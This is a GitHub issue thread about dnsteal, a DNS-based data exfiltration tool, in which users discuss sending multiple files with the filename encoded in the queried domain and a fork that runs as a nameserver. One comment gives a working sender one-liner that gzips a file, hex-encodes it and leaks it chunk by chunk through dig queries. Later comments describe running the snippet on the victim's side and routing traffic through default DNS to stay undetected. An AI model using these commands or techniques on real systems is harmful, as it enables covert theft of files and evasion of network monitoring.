### ISSUE TITLE
Feature request

### ISSUE THREAD

**Issue by nemanjan00** [m57/dnsteal#1]
From what I understand, any domain can be used, just subdomain is used for data transfer? What about implementing retrival of multiple files by using domainname as filename... 
For example 5dfe8d9efd185b0f90a5fe6f17fcdc934d37a9e8fedff1cc73450057a2ad.image.png?

**Comment by m57** [comment]
very cool yeah, then I could add in a recursive option for copying whole folders and their contents... nice. I will look into it. Thanks

**Comment by nemanjan00** [comment]
I created this one but it does not support folders yet... 
https://github.com/nemanjan00/dnsteal
I will be developing fork for my own needs...

**Comment by m57** [comment]
OK I will be adding the features in. Would appreciate it if you credited the source code though :)

**Comment by nemanjan00** [comment]
There is note in README that my repo is fork of yours. :)

**Comment by nemanjan00** [comment]
Oh, and BTW, you are missing  " ; done" in all examples of sender...

**Comment by m57** [comment]
i dont understand the last comment? sorry.

**Comment by nemanjan00** [comment]
In your examples " ; done" is missing

``` bash
 for b in $(gzip -c dns-exfil.PNG | xxd -p); do dig +short @localhost $b.domainau.png ; done
```

**Comment by m57** [comment]
ah yes, thanks :)

**Comment by m57** [comment]
Added support for multiple file transfer, case closed :)

**Comment by mostafahussein** [comment]
@nemanjan00 could you explain for me what do you mean by using a domain name as a file name ?

I am just trying to test this too , and i am trying to connect to ns1.foobar.com (e.g. ns1.github.com or any other nameserver ) but it seems that i cannot connect anything else but a localhost on my personal computer. could you explain then ?

**Comment by nemanjan00** [comment]
Well, since you are giving dig a server to use for resolving, you can pass anything as a domain name which is intended to be resolved. It does not have to be a real domain, it can be a filename insted...

**Comment by mostafahussein** [comment]
But you cannot connect to the victim dns from outside right ? i mean for dnsteal doesn't work from outside

**Comment by nemanjan00** [comment]
dnsteal server is intended to run on your server. And only the snipet for sending file is running on victim side. :)

**Comment by nemanjan00** [comment]
BTW, mine version works as a nameserver... :)
No need for using @server in dig... And traffic goes through default DNS which makes it even more untetectable... 
Also, it writes data in realtime so no need for restart... 
https://github.com/nemanjan00/dnsteal
